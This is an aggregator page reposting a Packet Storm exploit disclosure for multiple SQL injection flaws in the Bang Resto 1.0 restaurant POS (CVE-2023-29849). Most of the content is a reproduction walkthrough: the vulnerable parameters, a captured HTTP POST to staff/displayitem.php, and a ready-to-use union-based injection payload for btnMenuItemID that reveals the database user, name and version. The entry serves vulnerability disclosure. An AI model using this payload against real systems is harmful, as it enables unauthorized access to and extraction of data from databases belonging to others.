Security
Headlines
HeadlinesLatestCVEs

Headline

Bang Resto 1.0 SQL Injection

Bang Resto version 1.0 suffers from multiple SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to nu11secur1ty in December of 2022.

Packet Storm
#sql#vulnerability#windows#apache#git#php#auth#firefox
# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection# Date: 2023-04-02# Exploit Author: Rahad Chowdhury# Vendor Homepage:https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html# Software Link:https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip# Version: 1.0# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-29849*Affected Parameters:*btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],itemqty[], btnMenuItemID*Steps to Reproduce:*1. First login your staff panel.2. then go to "order" menu and Select menu then create order and interceptrequest data using burp suite.so your request data will be:POST /bangresto/staff/displayitem.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/111.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 194Origin: http://127.0.0.1Referer: http://127.0.0.1/bangresto/staff/order.phpCookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5Connection: closebtnMenuItemID=1&qty=13. "btnMenuItemID" parameter is vulnerable. Let's try to inject union basedSQL Injection use this query ".1 union select1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())---" in "btnMenuItemID" parameter.4. Check browser you will see user, database and version informations.

Related news

CVE-2023-29849

Bang Resto 1.0 was discovered to contain multiple SQL injection vulnerabilities via the btnMenuItemID, itemID, itemPrice, menuID, staffID, or itemqty parameter.

Packet Storm: Latest News

ABB Cylon Aspect 3.08.01 vstatConfigurationDownload.php Configuration Download